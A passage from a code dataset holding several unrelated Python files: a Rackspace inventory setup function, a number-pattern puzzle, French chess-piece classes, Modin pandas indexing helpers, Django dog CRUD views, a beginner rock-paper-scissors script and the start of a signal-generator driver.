pyrax.get_setting('keyring_username')\n creds_file = get_config(p, 'rax', 'creds_file', 'RAX_CREDS_FILE', None)\n if (creds_file is not None):\n creds_file = os.path.expanduser(creds_file)\n elif os.path.isfile(default_creds_file):\n creds_file = default_creds_file\n elif (not keyring_username):\n sys.exit(('No value in environment variable %s and/or no credentials file at %s' % ('RAX_CREDS_FILE', default_creds_file)))\n identity_type = pyrax.get_setting('identity_type')\n pyrax.set_setting('identity_type', (identity_type or 'rackspace'))\n region = pyrax.get_setting('region')\n try:\n if keyring_username:\n pyrax.keyring_auth(keyring_username, region=region)\n else:\n pyrax.set_credential_file(creds_file, region=region)\n except Exception as e:\n sys.exit(('%s: %s' % (e, e.message)))\n regions = []\n if region:\n regions.append(region)\n else:\n try:\n region_list = get_config(p, 'rax', 'regions', 'RAX_REGION', 'all', value_type='list')\n except TypeError:\n region_list = get_config(p, 'rax', 'regions', 'RAX_REGION', 'all', islist=True)\n for region in region_list:\n region = region.strip().upper()\n if (region == 'ALL'):\n regions = pyrax.regions\n break\n elif (region not in pyrax.regions):\n sys.exit(('Unsupported region %s' % region))\n elif (region not in regions):\n regions.append(region)\n return regions","sub_path":"Data Set/bug-fixing-3/f7d9a734d5ad1add9bc18d19ccf32e123c972e44-<setup>-fix.py","file_name":"f7d9a734d5ad1add9bc18d19ccf32e123c972e44-<setup>-fix.py","file_ext":"py","file_size_in_byte":1779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"208454862","text":"##Decode the logic and print the pattern that corresponds to the given input\n#SI 1 - 3\n#SO 1 \n# 10203010011012\n# **4050809\n# ****607\n\nn = int(input())\nline = 0\nk=n\nstart=1\nfin = n*(n+1)+1\nfor i in range(n):\n print('**'*line, end='')\n line+=1\n for _ in range(k):\n print(start,end='0')\n start+=1\n \n for j in range(k,0,-1):\n print(fin-j, end='')\n if j!=1:\n print(0,end='')\n fin-=k\n k-=1\n print()\n","sub_path":"decode-logic-pattern.py","file_name":"decode-logic-pattern.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"43819020","text":"# -*- coding: utf-8 -*-\r\n\"\"\"Module contenant la classe de base Piece, ainsi qu'une classe fille pour chacun des types de pièces du jeu d'échecs.\r\n\r\n\"\"\"\r\n# TODO: Si votre système n'affiche pas correctement les caractères unicodes du jeu d'échecs,\r\n# mettez cette constante (variable globale) à False. Un tutoriel est présent sur le site Web\r\n# du cours pour vous aider à faire fonctionner les caractères Unicoe sous Windows.\r\nUTILISER_UNICODE = True\r\n\r\n\r\nclass Piece:\r\n \"\"\"Une classe de base représentant une pièce du jeu d'échecs. C'est cette classe qui est héritée plus bas pour fournir\r\n une classe par type de pièce (Pion, Tour, etc.).\r\n\r\n Attributes:\r\n couleur (str): La couleur de la pièce, soit 'blanc' ou 'noir'.\r\n peut_sauter (bool): Si oui ou non la pièce peut \"sauter\" par dessus d'autres pièces sur un échiquier.\r\n\r\n Args:\r\n couleur (str): La couleur avec laquelle créer la pièce.\r\n peut_sauter (bool): La valeur avec laquelle l'attribut peut_sauter doit être initialisé.\r\n\r\n \"\"\"\r\n def __init__(self, couleur, peut_sauter):\r\n # Validation si la couleur reçue est valide.\r\n assert couleur in ('blanc', 'noir')\r\n\r\n # Création des attributs avec les valeurs reçues.\r\n self.couleur = couleur\r\n self.peut_sauter = peut_sauter\r\n\r\n def est_blanc(self):\r\n \"\"\"Retourne si oui ou non la pièce est blanche.\r\n\r\n Returns:\r\n bool: True si la pièce est blanche, et False autrement.\r\n\r\n \"\"\"\r\n return self.couleur == 'blanc'\r\n\r\n def est_noir(self):\r\n \"\"\"Retourne si oui ou non la pièce est noire.\r\n\r\n Returns:\r\n bool: True si la pièce est noire, et False autrement.\r\n\r\n \"\"\"\r\n return self.couleur == 'noir'\r\n\r\n def peut_se_deplacer_vers(self, position_source, position_cible):\r\n \"\"\"Vérifie si, selon les règles du jeu d'échecs, la pièce peut se déplacer d'une position à une autre.\r\n\r\n Une position est une chaîne de deux caractères.\r\n Le premier caractère est une lettre entre a et h, représentant la colonne de l'échiquier.\r\n Le second caractère est un chiffre entre 1 et 8, représentant la rangée de l'échiquier.\r\n\r\n Args:\r\n position_source (str): La position source, suivant le format ci-haut. Par exemple, 'a8', 'f3', etc.\r\n position_cible (str): La position cible, suivant le format ci-haut. Par exemple, 'b6', 'h1', etc.\r\n\r\n Warning:\r\n Comme nous sommes dans la classe de base et non dans l'une des classes filles, nous ne savons pas\r\n (encore) comment cette pièce se déplace. Cette méthode est donc à redéfinir dans chacune des\r\n classes filles.\r\n\r\n Warning:\r\n Comme la classe Piece est indépendante de l'échiquier (et donc on ne sait pas si une pièce est \"dans le\r\n chemin\"), on doit ignorer le contenu de l'échiquier : on ne se concentre que sur les règles de mouvement\r\n des pièces.\r\n\r\n Returns:\r\n bool: True si le déplacement est valide en suivant les règles de la pièce, et False autrement.\r\n\r\n \"\"\"\r\n # On lance une exception (on y reviendra) indiquant que ce code n'a pas été implémenté. Ne touchez pas\r\n # à cette méthode : réimplémentez-la dans les classes filles!\r\n raise NotImplementedError\r\n\r\n def peut_faire_une_prise_vers(self, position_source, position_cible):\r\n \"\"\"Vérifie si, selon les règles du jeu d'échecs, la pièce peut \"manger\" (faire une prise) une pièce ennemie.\r\n Pour la plupart des pièces, la règle est la même, on appelle donc la méthode peut_se_deplacer_vers.\r\n\r\n Si ce n'est pas le cas pour une certaine pièce, on peut simplement redéfinir cette méthode pour programmer\r\n la règle.\r\n\r\n Args:\r\n position_source (str): La position source, suivant le format ci-haut. Par exemple, 'a8', 'f3', etc.\r\n position_cible (str): La position cible, suivant le format ci-haut. Par exemple, 'b6', 'h1', etc.\r\n\r\n Returns:\r\n bool: True si la prise est valide en suivant les règles de la pièce, et False autrement.\r\n\r\n \"\"\"\r\n return self.peut_se_deplacer_vers(position_source, position_cible)\r\n\r\n\r\nclass Pion(Piece):\r\n def __init__(self, couleur):\r\n super().__init__(couleur, False)\r\n\r\n def peut_se_deplacer_vers(self, position_source, position_cible):\r\n colonne_source, colonne_cible = ord(position_source[0]), ord(position_cible[0])\r\n rangee_source, rangee_cible = int(position_source[1]), int(position_cible[1])\r\n\r\n # Un pion se déplace sur une même colonne.\r\n if colonne_cible != colonne_source:\r\n return False\r\n\r\n # Si le pion n'a jamais bougé, il peut bouger de deux cases. Sinon, seulement d'une case.\r\n # Notez que c'est ici le seul endroit où nous faisons référence à la taille de l'échiquier.\r\n # Pour rendre nos classes de pièces vraiment indépendantes de cette taille, nous pourrions\r\n # par exemple ajouter un attribut n_deplacements, qui sera incrémenté si la pièce se\r\n # déplace.\r\n difference = rangee_source - rangee_cible\r\n if self.est_blanc():\r\n if rangee_source == 2:\r\n return difference in (-1, -2)\r\n else:\r\n return difference == -1\r\n\r\n else:\r\n if rangee_source == 7:\r\n return difference in (1, 2)\r\n else:\r\n return difference == 1\r\n\r\n def peut_faire_une_prise_vers(self, position_source, position_cible):\r\n colonne_source, colonne_cible = ord(position_source[0]), ord(position_cible[0])\r\n rangee_source, rangee_cible = int(position_source[1]), int(position_cible[1])\r\n\r\n # Le pion fait une prise en diagonale, d'une case seulement, et la direction dépend\r\n # de sa couleur.\r\n if colonne_cible not in (colonne_source - 1, colonne_source + 1):\r\n return False\r\n\r\n if self.est_blanc():\r\n return rangee_cible == rangee_source + 1\r\n\r\n else:\r\n return rangee_cible == rangee_source - 1\r\n\r\n def __repr__(self):\r\n \"\"\"Redéfinit comment on affiche un pion à l'écran. Nous utilisons la constante UTILISER_UNICODE\r\n pour déterminer comment afficher le pion.\r\n\r\n Returns:\r\n str: La chaîne de caractères représentant le pion.\r\n\r\n \"\"\"\r\n if self.est_blanc():\r\n if UTILISER_UNICODE:\r\n return '\\u2659'\r\n else:\r\n return 'PB'\r\n else:\r\n if UTILISER_UNICODE:\r\n return '\\u265f'\r\n else:\r\n return 'PN'\r\n\r\n\r\nclass Tour(Piece):\r\n def __init__(self, couleur):\r\n super().__init__(couleur, False)\r\n\r\n def peut_se_deplacer_vers(self, position_source, position_cible):\r\n colonne_source, colonne_cible = position_source[0], position_cible[0]\r\n rangee_source, rangee_cible = position_source[1], position_cible[1]\r\n\r\n # Une tour se déplace sur une même rangée ou une même ligne, peu importe la direction.\r\n if colonne_cible != colonne_source and rangee_source != rangee_cible:\r\n return False\r\n\r\n # Par contre, elle ne peut pas rester sur place.\r\n if colonne_source == colonne_cible and rangee_source == rangee_cible:\r\n return False\r\n\r\n return True\r\n\r\n def __repr__(self):\r\n if self.est_blanc():\r\n if UTILISER_UNICODE:\r\n return '\\u2656'\r\n else:\r\n return 'TB'\r\n else:\r\n if UTILISER_UNICODE:\r\n return '\\u265c'\r\n else:\r\n return 'TN'\r\n\r\n\r\nclass Cavalier(Piece):\r\n def __init__(self, couleur):\r\n super().__init__(couleur, True)\r\n\r\n def peut_se_deplacer_vers(self, position_source, position_cible):\r\n colonne_source, colonne_cible = ord(position_source[0]), ord(position_cible[0])\r\n rangee_source, rangee_cible = int(position_source[1]), int(position_cible[1])\r\n\r\n # Un cavalier se déplace en \"L\", alors l'une de ses coordonnées soit varier de 1, et l'autre de 2.\r\n distance_colonne = abs(colonne_source - colonne_cible)\r\n distance_rangee = abs(rangee_source - rangee_cible)\r\n\r\n if distance_colonne == 1 and distance_rangee == 2:\r\n return True\r\n\r\n if distance_colonne == 2 and distance_rangee == 1:\r\n return True\r\n\r\n return False\r\n\r\n def __repr__(self):\r\n if self.est_blanc():\r\n if UTILISER_UNICODE:\r\n return '\\u2658'\r\n else:\r\n return 'CB'\r\n else:\r\n if UTILISER_UNICODE:\r\n return '\\u265e'\r\n else:\r\n return 'CN'\r\n\r\n\r\nclass Fou(Piece):\r\n def __init__(self, couleur):\r\n super().__init__(couleur, False)\r\n\r\n def peut_se_deplacer_vers(self, position_source, position_cible):\r\n # Un fou se déplace en diagonale, c'est à dire, la distance entre les rangées et colonnes doit être la même.\r\n colonne_source, colonne_cible = ord(position_source[0]), ord(position_cible[0])\r\n rangee_source, rangee_cible = int(position_source[1]), int(position_cible[1])\r\n\r\n if abs(colonne_source - colonne_cible) != abs(rangee_source - rangee_cible):\r\n return False\r\n\r\n # Par contre, il ne peut pas faire de sur-place.\r\n if colonne_source == colonne_cible and rangee_source == rangee_cible:\r\n\r\n return False\r\n return True\r\n\r\n\r\n def __repr__(self):\r\n if self.est_blanc():\r\n if UTILISER_UNICODE:\r\n return '\\u2657'\r\n else:\r\n return 'FB'\r\n else:\r\n if UTILISER_UNICODE:\r\n return '\\u265d'\r\n else:\r\n return 'FN'\r\n\r\n\r\nclass Roi(Piece):\r\n def __init__(self, couleur):\r\n super().__init__(couleur, False)\r\n\r\n def peut_se_deplacer_vers(self, position_source, position_cible):\r\n # Un roi peut se déplacer d'une case, sur une ligne, rangée ou colonne.\r\n colonne_source, colonne_cible = ord(position_source[0]), ord(position_cible[0])\r\n rangee_source, rangee_cible = int(position_source[1]), int(position_cible[1])\r\n\r\n distance_colonne = abs(colonne_source - colonne_cible)\r\n distance_rangee = abs(rangee_source - rangee_cible)\r\n\r\n if distance_rangee != 1 and distance_colonne != 1:\r\n return False\r\n\r\n return True\r\n\r\n def __repr__(self):\r\n if self.est_blanc():\r\n if UTILISER_UNICODE:\r\n return '\\u2654'\r\n else:\r\n return 'RB'\r\n else:\r\n if UTILISER_UNICODE:\r\n return '\\u265a'\r\n else:\r\n return 'RN'\r\n\r\n\r\nclass Dame(Piece):\r\n def __init__(self, couleur):\r\n super().__init__(couleur, False)\r\n\r\n def peut_se_deplacer_vers(self, position_source, position_cible):\r\n # Une mouvement pour une dame est valide si elle se déplace sur une rangée, colonne ou en diagonale.\r\n # Notez que nous utilisons directement les méthodes à partir d'une classe, en passant comme premier\r\n # argument l'objet courant (self). Il aurait été plus \"propre\" de se créer des nouvelles fonctions\r\n # communes aux classes Tour, Fou et Dame pour éviter de faire ces appels à partir de la classe.\r\n return Tour.peut_se_deplacer_vers(self, position_source, position_cible) or \\\r\n Fou.peut_se_deplacer_vers(self, position_source, position_cible)\r\n\r\n def __repr__(self):\r\n if self.est_blanc():\r\n if UTILISER_UNICODE:\r\n return '\\u2655'\r\n else:\r\n return 'DB'\r\n else:\r\n if UTILISER_UNICODE:\r\n return '\\u265b'\r\n else:\r\n return 'DN'\r\n","sub_path":"TP4/pychecs2/echecs/piece.py","file_name":"piece.py","file_ext":"py","file_size_in_byte":12065,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"575555985","text":"import numpy as np\nimport pandas\nfrom pandas.api.types import is_scalar, is_list_like, is_bool\nfrom pandas.core.dtypes.common import is_integer\nfrom pandas.core.indexing import IndexingError\n\nfrom .dataframe import DataFrame\nfrom .series import Series\n\n\"\"\"Indexing Helper Class works as follows:\n\n_LocationIndexerBase provide methods framework for __getitem__\n and __setitem__ that work with Ray DataFrame's internal index. Base\n class's __{get,set}item__ takes in partitions & idx_in_partition data\n and perform lookup/item write.\n\n_LocIndexer and _iLocIndexer is responsible for indexer specific logic and\n lookup computation. Loc will take care of enlarge DataFrame. Both indexer\n will take care of translating pandas's lookup to Ray DataFrame's internal\n lookup.\n\nAn illustration is available at\nhttps://github.com/ray-project/ray/pull/1955#issuecomment-386781826\n\"\"\"\n\n\ndef is_slice(x):\n return isinstance(x, slice)\n\n\ndef is_2d(x):\n return is_list_like(x) or is_slice(x)\n\n\ndef is_tuple(x):\n return isinstance(x, tuple)\n\n\ndef is_boolean_array(x):\n return is_list_like(x) and all(map(is_bool, x))\n\n\ndef is_integer_slice(x):\n if not is_slice(x):\n return False\n for pos in [x.start, x.stop, x.step]:\n if not ((pos is None) or is_integer(pos)):\n return False # one position is neither None nor int\n return True\n\n\n_ILOC_INT_ONLY_ERROR = \"\"\"\nLocation based indexing can only have [integer, integer slice (START point is\nINCLUDED, END point is EXCLUDED), listlike of integers, boolean array] types.\n\"\"\"\n\n_VIEW_IS_COPY_WARNING = \"\"\"\nModin is making a copy of of the DataFrame. This behavior diverges from Pandas.\nThis will be fixed in future releases.\n\"\"\"\n\n\ndef _parse_tuple(tup):\n \"\"\"Unpack the user input for getitem and setitem and compute ndim\n\n loc[a] -> ([a], :), 1D\n loc[[a,b],] -> ([a,b], :),\n loc[a,b] -> ([a], [b]), 0D\n \"\"\"\n row_loc, col_loc = slice(None), slice(None)\n\n if is_tuple(tup):\n row_loc = tup[0]\n if len(tup) == 2:\n col_loc = tup[1]\n if len(tup) > 2:\n raise IndexingError(\"Too many indexers\")\n else:\n row_loc = tup\n\n ndim = _compute_ndim(row_loc, col_loc)\n row_scaler = is_scalar(row_loc)\n col_scaler = is_scalar(col_loc)\n row_loc = [row_loc] if row_scaler else row_loc\n col_loc = [col_loc] if col_scaler else col_loc\n\n return row_loc, col_loc, ndim, row_scaler, col_scaler\n\n\ndef _compute_ndim(row_loc, col_loc):\n \"\"\"Compute the ndim of result from locators\n \"\"\"\n row_scaler = is_scalar(row_loc) or is_tuple(row_loc)\n col_scaler = is_scalar(col_loc) or is_tuple(col_loc)\n\n if row_scaler and col_scaler:\n ndim = 0\n elif row_scaler ^ col_scaler:\n ndim = 1\n else:\n ndim = 2\n\n return ndim\n\n\nclass _LocationIndexerBase(object):\n \"\"\"Base class for location indexer like loc and iloc\n \"\"\"\n\n def __init__(self, ray_df):\n self.df = ray_df\n self.qc = ray_df._query_compiler\n self.row_scaler = False\n self.col_scaler = False\n\n def __getitem__(self, row_lookup, col_lookup, ndim):\n qc_view = self.qc.view(row_lookup, col_lookup)\n if ndim == 2:\n return self.df.__constructor__(query_compiler=qc_view)\n if isinstance(self.df, Series) and not self.row_scaler:\n return self.df.__constructor__(query_compiler=qc_view)\n if isinstance(self.df, Series):\n axis = 0\n elif ndim == 0:\n axis = None\n else:\n axis = (\n None\n if self.col_scaler and self.row_scaler\n else 1\n if self.col_scaler\n else 0\n )\n return self.df.__constructor__(query_compiler=qc_view).squeeze(axis=axis)\n\n def __setitem__(self, row_lookup, col_lookup, item):\n \"\"\"\n Args:\n row_lookup: the global row index to write item to\n col_lookup: the global col index to write item to\n item: The new item needs to be set. It can be any shape that's\n broadcast-able to the product of the lookup tables.\n \"\"\"\n if len(row_lookup) == len(self.qc.index) and len(col_lookup) == 1:\n self.df[self.df.columns[col_lookup][0]] = item\n elif len(col_lookup) == len(self.qc.columns) and len(row_lookup) == 1:\n if hasattr(item, \"_query_compiler\"):\n item = item._query_compiler\n new_qc = self.qc.setitem(1, self.qc.index[row_lookup[0]], item)\n self.df._create_or_update_from_compiler(new_qc, inplace=True)\n else:\n to_shape = (len(row_lookup), len(col_lookup))\n item = self._broadcast_item(row_lookup, col_lookup, item, to_shape)\n self._write_items(row_lookup, col_lookup, item)\n\n def _broadcast_item(self, row_lookup, col_lookup, item, to_shape):\n \"\"\"Use numpy to broadcast or reshape item.\n\n Notes:\n - Numpy is memory efficient, there shouldn't be performance issue.\n \"\"\"\n # It is valid to pass a DataFrame or Series to __setitem__ that is larger than\n # the target the user is trying to overwrite. This\n if isinstance(item, (pandas.Series, pandas.DataFrame, DataFrame)):\n if not all(idx in item.index for idx in row_lookup):\n raise ValueError(\n \"Must have equal len keys and value when setting with \"\n \"an iterable\"\n )\n if hasattr(item, \"columns\"):\n if not all(idx in item.columns for idx in col_lookup):\n raise ValueError(\n \"Must have equal len keys and value when setting \"\n \"with an iterable\"\n )\n item = item.reindex(index=row_lookup, columns=col_lookup)\n else:\n item = item.reindex(index=row_lookup)\n try:\n item = np.array(item)\n if np.prod(to_shape) == np.prod(item.shape):\n return item.reshape(to_shape)\n else:\n return np.broadcast_to(item, to_shape)\n except ValueError:\n from_shape = np.array(item).shape\n raise ValueError(\n \"could not broadcast input array from shape {from_shape} into shape \"\n \"{to_shape}\".format(from_shape=from_shape, to_shape=to_shape)\n )\n\n def _write_items(self, row_lookup, col_lookup, item):\n \"\"\"Perform remote write and replace blocks.\n \"\"\"\n new_qc = self.qc.write_items(row_lookup, col_lookup, item)\n self.df._create_or_update_from_compiler(new_qc, inplace=True)\n\n\nclass _LocIndexer(_LocationIndexerBase):\n \"\"\"A indexer for ray_df.loc[] functionality\"\"\"\n\n def __getitem__(self, key):\n row_loc, col_loc, ndim, self.row_scaler, self.col_scaler = _parse_tuple(key)\n if isinstance(row_loc, slice) and row_loc == slice(None):\n # If we're only slicing columns, handle the case with `__getitem__`\n if not isinstance(col_loc, slice):\n # Boolean indexers can just be sliced into the columns object and\n # then passed to `__getitem__`\n if is_boolean_array(col_loc):\n col_loc = self.df.columns[col_loc]\n return self.df.__getitem__(col_loc)\n else:\n result_slice = self.df.columns.slice_locs(col_loc.start, col_loc.stop)\n return self.df.iloc[:, slice(*result_slice)]\n\n row_lookup, col_lookup = self._compute_lookup(row_loc, col_loc)\n result = super(_LocIndexer, self).__getitem__(row_lookup, col_lookup, ndim)\n # Pandas drops the levels that are in the `loc`, so we have to as well.\n if hasattr(result, \"index\") and isinstance(result.index, pandas.MultiIndex):\n if (\n isinstance(result, Series)\n and not isinstance(col_loc, slice)\n and all(\n col_loc[i] in result.index.levels[i] for i in range(len(col_loc))\n )\n ):\n result.index = result.index.droplevel(list(range(len(col_loc))))\n elif all(row_loc[i] in result.index.levels[i] for i in range(len(row_loc))):\n result.index = result.index.droplevel(list(range(len(row_loc))))\n if (\n hasattr(result, \"columns\")\n and isinstance(result.columns, pandas.MultiIndex)\n and all(col_loc[i] in result.columns.levels[i] for i in range(len(col_loc)))\n ):\n result.columns = result.columns.droplevel(list(range(len(col_loc))))\n return result\n\n def __setitem__(self, key, item):\n row_loc, col_loc, _, __, ___ = _parse_tuple(key)\n if isinstance(row_loc, list) and len(row_loc) == 1:\n if row_loc[0] not in self.qc.index:\n index = self.qc.index.insert(len(self.qc.index), row_loc[0])\n self.qc = self.qc.reindex(labels=index, axis=0)\n self.df._update_inplace(new_query_compiler=self.qc)\n\n if (\n isinstance(col_loc, list)\n and len(col_loc) == 1\n and col_loc[0] not in self.qc.columns\n ):\n new_col = pandas.Series(index=self.df.index)\n new_col[row_loc] = item\n self.df.insert(loc=len(self.df.columns), column=col_loc[0], value=new_col)\n self.qc = self.df._query_compiler\n else:\n row_lookup, col_lookup = self._compute_lookup(row_loc, col_loc)\n super(_LocIndexer, self).__setitem__(row_lookup, col_lookup, item)\n\n def _compute_enlarge_labels(self, locator, base_index):\n \"\"\"Helper for _enlarge_axis, compute common labels and extra labels.\n\n Returns:\n nan_labels: The labels needs to be added\n \"\"\"\n # base_index_type can be pd.Index or pd.DatetimeIndex\n # depending on user input and pandas behavior\n # See issue #2264\n base_index_type = type(base_index)\n locator_as_index = base_index_type(locator)\n\n nan_labels = locator_as_index.difference(base_index)\n common_labels = locator_as_index.intersection(base_index)\n\n if len(common_labels) == 0:\n raise KeyError(\n \"None of [{labels}] are in the [{base_index_name}]\".format(\n labels=list(locator_as_index), base_index_name=base_index\n )\n )\n return nan_labels\n\n def _compute_lookup(self, row_loc, col_loc):\n if is_list_like(row_loc) and len(row_loc) == 1:\n if (\n isinstance(self.qc.index.values[0], np.datetime64)\n and type(row_loc[0]) != np.datetime64\n ):\n row_loc = [pandas.to_datetime(row_loc[0])]\n\n if isinstance(row_loc, slice):\n row_lookup = self.qc.index.get_indexer_for(\n self.qc.index.to_series().loc[row_loc]\n )\n elif isinstance(self.qc.index, pandas.MultiIndex):\n row_lookup = self.qc.index.get_locs(row_loc)\n elif is_boolean_array(row_loc):\n # If passed in a list of booleans, we return the index of the true values\n row_lookup = [i for i, row_val in enumerate(row_loc) if row_val]\n else:\n row_lookup = self.qc.index.get_indexer_for(row_loc)\n if isinstance(col_loc, slice):\n col_lookup = self.qc.columns.get_indexer_for(\n self.qc.columns.to_series().loc[col_loc]\n )\n elif isinstance(self.qc.columns, pandas.MultiIndex):\n col_lookup = self.qc.columns.get_locs(col_loc)\n elif is_boolean_array(col_loc):\n # If passed in a list of booleans, we return the index of the true values\n col_lookup = [i for i, col_val in enumerate(col_loc) if col_val]\n else:\n col_lookup = self.qc.columns.get_indexer_for(col_loc)\n return row_lookup, col_lookup\n\n\nclass _iLocIndexer(_LocationIndexerBase):\n \"\"\"A indexer for ray_df.iloc[] functionality\"\"\"\n\n def __getitem__(self, key):\n row_loc, col_loc, ndim, self.row_scaler, self.col_scaler = _parse_tuple(key)\n self._check_dtypes(row_loc)\n self._check_dtypes(col_loc)\n\n row_lookup, col_lookup = self._compute_lookup(row_loc, col_loc)\n result = super(_iLocIndexer, self).__getitem__(row_lookup, col_lookup, ndim)\n return result\n\n def __setitem__(self, key, item):\n row_loc, col_loc, _, __, ___ = _parse_tuple(key)\n self._check_dtypes(row_loc)\n self._check_dtypes(col_loc)\n\n row_lookup, col_lookup = self._compute_lookup(row_loc, col_loc)\n super(_iLocIndexer, self).__setitem__(row_lookup, col_lookup, item)\n\n def _compute_lookup(self, row_loc, col_loc):\n row_lookup = (\n pandas.RangeIndex(len(self.qc.index)).to_series().iloc[row_loc].index\n )\n col_lookup = (\n pandas.RangeIndex(len(self.qc.columns)).to_series().iloc[col_loc].index\n )\n return row_lookup, col_lookup\n\n def _check_dtypes(self, locator):\n is_int = is_integer(locator)\n is_int_slice = is_integer_slice(locator)\n is_int_list = is_list_like(locator) and all(map(is_integer, locator))\n is_bool_arr = is_boolean_array(locator)\n\n if not any([is_int, is_int_slice, is_int_list, is_bool_arr]):\n raise ValueError(_ILOC_INT_ONLY_ERROR)\n","sub_path":"modin/pandas/indexing.py","file_name":"indexing.py","file_ext":"py","file_size_in_byte":13478,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"231296154","text":"from django.contrib import messages\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.shortcuts import render, get_object_or_404, redirect\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\n\n# Create your views here.\nfrom .models import Dog\nfrom .forms import DogForm\n\n\ndef dog_create(request): # put create\n form = DogForm(request.POST or None)\n if form.is_valid():\n instance = form.save(commit=False)\n # print(form.cleaned_data.get('title'))\n messages.success(request, 'Successfully Created')\n instance.save()\n return HttpResponseRedirect(instance.get_absolute_url())\n # if request.method == 'POST':\n # print(request.POST.get('content'))\n # print(request.POST.get('title'))\n context = {\n 'form': form\n }\n return render(request, 'dog_form.html', context)\n\n\ndef dog_detail(request, id=None): # get/retrieve\n #instance = Dog.objects.get(id=1)\n instance = get_object_or_404(Dog, id=id)\n context = {\n 'name': instance.name,\n 'instance': instance,\n }\n return render(request, 'dog_detail.html', context)\n\n\ndef dog_list(request): # list items\n queryset_list = Dog.objects.all() # .order_by(\"-timestamp\")\n paginator = Paginator(queryset_list, 10) # Show 10 dogs per page\n page_request_var = 'page'\n page = request.GET.get(page_request_var)\n try:\n queryset = paginator.page(page)\n except PageNotAnInteger:\n # If page is not an integer, deliver first page.\n queryset = paginator.page(1)\n except EmptyPage:\n # If page is out of range (e.g. 9999), deliver last page of results.\n queryset = paginator.page(paginator.num_pages)\n\n context = {\n 'object_list': queryset,\n 'page_title': 'List of all dogs',\n 'page_request_var': page_request_var,\n }\n\n # if request.user.is_authenticated():\n # context = {\n # 'title': 'My User List'\n # }\n # else:\n # context = {\n # 'title': 'List'\n # }\n return render(request, 'dog_list.html', context)\n\n\ndef dog_update(request, id=None):\n instance = get_object_or_404(Dog, id=id)\n form = DogForm(request.POST or None, instance=instance)\n if form.is_valid():\n instance = form.save(commit=False)\n instance.save()\n messages.success(request, '<a href=\"#\">Edit</a> Saved',\n extra_tags='html_safe')\n return HttpResponseRedirect(instance.get_absolute_url())\n\n context = {\n 'name': instance.name,\n 'instance': instance,\n 'form': form,\n }\n return render(request, 'dog_form.html', context)\n\n\ndef dog_delete(request, id=None):\n instance = get_object_or_404(Dog, id=id)\n instance.delete()\n messages.success(request, 'Dog Deleted')\n return redirect('dogs:list')\n","sub_path":"canil/focinhobook/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"180396230","text":"\r\nimport random \r\n\r\ndef rock_paper_sissors():\r\n anwser = int(input(\"Welcome to Rock, Paper, Sissors. Enter r for Rock, p for Paper, or s for Sissors:\"))\r\n \r\n Randomchoice = random.choice(\"Rock\",\"Paper\",\"Sissors\")\r\n #Ties\r\n if (anwser == r and Randomchoice == Rock):\r\n print(\"Tie, Rock, ties with Rock\")\r\n elif (anwser == p and Randomchoice == Paper):\r\n print(\"Tie, paper, ties with paper\")\r\n elif (anwser == s and Randomchoice == Sissors):\r\n print(\"Tie, Sissors, ties with Sissors\") \r\n #Anwser = rock\r\n elif (anwser == r and Randomchoice == Paper):\r\n print(\"You lose, paper covers rock\") \r\n elif (anwser == r and Randomchoice == Sissors):\r\n print(\"You win, Rock crushes sissors\") \r\n #Anwser = Paper\r\n elif (anwser == p and Randomchoice == Rock):\r\n print(\"You win, paper covers rock\") \r\n elif (anwser == p and Randomchoice == Sissors):\r\n print(\"You lose, sissors cut paper\") \r\n #Anwser = sissors\r\n elif (anwser == s and Randomchoice == Rock):\r\n print(\"You lose, Rock crushes sissors\") \r\n elif (anwser == s and Randomchoice == Paper):\r\n print(\"You win, sissors cuts paper\") \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\nrock_paper_sissors()","sub_path":"Rock Paper Sissors-1.py","file_name":"Rock Paper Sissors-1.py","file_ext":"py","file_size_in_byte":1263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"145849702","text":"#!/usr/bin/env python\n# vim:fileencoding=utf-8\n\n'''\nsg.py - Signal Generator module\n\nCopyright (C) Hatano group, Tokyo Tech - All Rights Reserved.\nThis file is a part of Meow project.\nMeow project is now proprietary and confidential.\nUnauthorized copying or redistribution of this file, via any medium, is strictly prohibited.\n\navailable class(es):\n AgilentE8267D - for Agilent E8267D Signal Generator\n HP83620B - for Hewlett Packard 83620B Signal Generator\n HP83752A - for Hewlett Packard 83752A Signal Generator\n'''\n\n#import time\n\nfrom Inst.exceptions import *\nfrom Inst.Instrument import Instrument\n\n\nclass AgilentE8267D(Instrument):\n '''Class for E8267D\n\n Note that this class is a bit obsolete. Should be subclass of HP_SG in the future.\n '''\n\n def output(self, on):\n if on:\n self.inst.write(\"OUTP ON\")\n else:\n self.inst.write(\"OUTP OFF\")\n\n def query_power_condition(self):\n ans = int(self.inst.ask(\":STAT:QUES:POW:COND?\"))\n\n if ans == 2:\n self.logger.warning(\"OUTPUT UNLEVELED\")\n elif ans > 0:\n self.logger.warning(\"POWER CONDITION IS QUESTIONABLE\")\n\n return ans\n\n def set_freq_mode(self, mode):\n '''Set Frequency mode\n available values: FIXed CW SWEep LIST'''\n\n if mode.upper() not in ('FIXED', 'FIX', 'CW', 'SWEEP', 'SWE', 'LIST'):\n raise InstProgError('invalid frequency mode.', self.__class__.__name__)\n\n self.inst.write(\"FREQ:MODE \" + mode)\n\n def setup_CW(self, freq, power):\n \"\"\"Setting Continuous Wave output\"\"\"\n\n self.rst()\n\n self.set_freq_mode(\"CW\")\n\n self.set_freq_CW(freq)\n\n self.inst.write(\"POW %.3f dBm\" % power)\n\n def set_freq_CW(self, freq):\n if isinstance(freq, str):\n self.inst.write(\"FREQ %s\" % freq)\n elif isinstance(freq, float) or isinstance(freq, int):\n self.inst.write(\"FREQ %.12E\" % freq)\n\n\nclass HP_SG(Instrument):\n '''Base Class for 83620B and 83752A\n '''\n\n POWER_MODE = ('FIXED', 'FIX', 'SWEEP', 'SWE')\n\n def __init__(self, resource, power_bounds, freq_bounds):\n 